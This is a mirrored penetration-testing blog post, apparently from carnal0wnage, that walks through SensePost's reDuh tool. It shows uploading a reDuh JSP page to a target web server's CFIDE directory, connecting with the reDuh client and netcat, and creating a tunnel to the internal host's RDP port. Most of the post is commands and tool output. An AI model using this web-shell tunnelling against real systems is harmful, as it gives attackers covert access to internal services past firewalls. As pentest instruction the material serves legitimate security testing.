(mirrored from carnal0wnage.attackresearch.com)A bit more on sensepost's reDuh sensepost page on it: http://www.sensepost.com/research/reDuh/ reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp[Info]Querying remote web page for usable remote service port[Info]Remote RPC port chosen as 42005[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...[Info]reDuhClient service listener started on local port 1010 Once you are connected to the remote end, in another terminal connect to your local reDuh instance. yomama@c0:~$ nc localhost 1010Welcome to the reDuh command line>>[usage]Commands are of the form [command]{options} Available commands:[usage] - This menu[createTunnel]::[killReDuh] - terminates remote JSP process, and ends this client program[DEBUG] - Sets the verbosity >>[createTunnel]4567:172.16.82.144:3389Successfully bound locally to port 4567. Awaiting connections. In your other shell you should see something similar to this:[Info]Caught new service connection on local port 1010[Info]Successfully bound locally to port 4567. Awaiting connections. Fire up your terminal server client and point it at localhost:4567 [Info]Requesting reDuh to create socket to 172.16.82.144:3389[Info]Successfully created socket 4567:172.16.82.144:3389:1[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)[Info]Caught data with sequenceNumber 0[Info]Localhost 172.16.82.144:3389:1 (386 bytes read from local socket)[Info]Caught data with sequenceNumber 1 If all is working you'll see a shitload of http traffic and eventually your RDP prompt.